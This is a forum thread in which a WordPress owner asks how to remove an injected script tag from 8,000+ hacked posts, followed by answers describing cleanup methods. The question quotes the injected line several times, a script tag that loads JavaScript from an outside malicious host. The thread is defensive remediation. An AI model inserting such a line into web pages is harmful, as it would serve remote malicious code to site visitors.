Home

The WordPress website got hacked, I need a query to remove the script between the code

I am using WordPress website, My website got hacked and I got below script code in all the post

Blockquote

<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>

Can anyone help me with a query to remove this code I tried the below code but it’s not working. I am getting zero rows affected.

Update wp_posts set post_content = replace(post_content, "<script src=‘https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>", "") where post_content like "%<script src=‘https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>%"

I have more than 8k records and I am sharing one-row value. Check at the end of the code i got script.

[vc_row css=".vc_custom_1553586206091{padding-top: 50px !important;padding-bottom: 50px !important;background-image: url(https://www.mysite.in/wp-content/uploads/2019/03/1161465.jpg?id=74) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}" el_class="red-overlay"][vc_column][vc_custom_heading text="" font_container="tag:h2|font_size:50px|text_align:center|color:%23ffffff" use_theme_fonts="yes" el_class="extrabold" css=".vc_custom_1553586443111{margin-bottom: 0px !important;padding-bottom: 0px !important;}"][vc_column_text el_class="banner_para"] [/vc_column_text][vc_wp_search el_id="bannerSearch"][/vc_column][/vc_row][vc_row full_width="stretch_row_content" css=".vc_custom_1553588147048{padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;background-image: url(https://www.mysite.in/wp-content/uploads/2019/03/asd?id=74) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}"][vc_column width="8/12" el_class="red-overlay"][/vc_column][vc_column width="4/12"][/vc_column][/vc_row]<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>
Asked on July 16, 2020 in Mysql.
Add Comment
Cancel
3 Answer(s)

Got the same problem, I currently replaced the URL in src field with the plugin "Velvet Blues Update URLs", so the JavaScript file can’t run.

<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>

is now

<script src='#' type=text/javascript></script>

I know it isn’t the best option, but it gives me time to look for a better solution and dig deeper.

Cancel
Answered on July 16, 2020.
Add Comment
Cancel

What i’ve done is exporting the database (affected tables) to file, used notepad++ to "find and replace" it. Dropped the table from the db and re-imported the wp_posts table

These are the tables that were affected: wp_options (siteurl and home) wp_posts multiple locations (in my case 2086 replaces)

Hope you get it fixed

Cancel
Answered on July 16, 2020.
Add Comment
Cancel

In my case both backend and frontend were not working. So first I fixed my backend by changing site url in wp-options After then I used WordFence security plugin to scan infected files. Deleted the infected files and the site is fine now. enter image description here

Cancel
Answered on July 16, 2020.
Add Comment
Cancel

Your Answer

By posting your answer, you agree to the privacy policy and terms of service.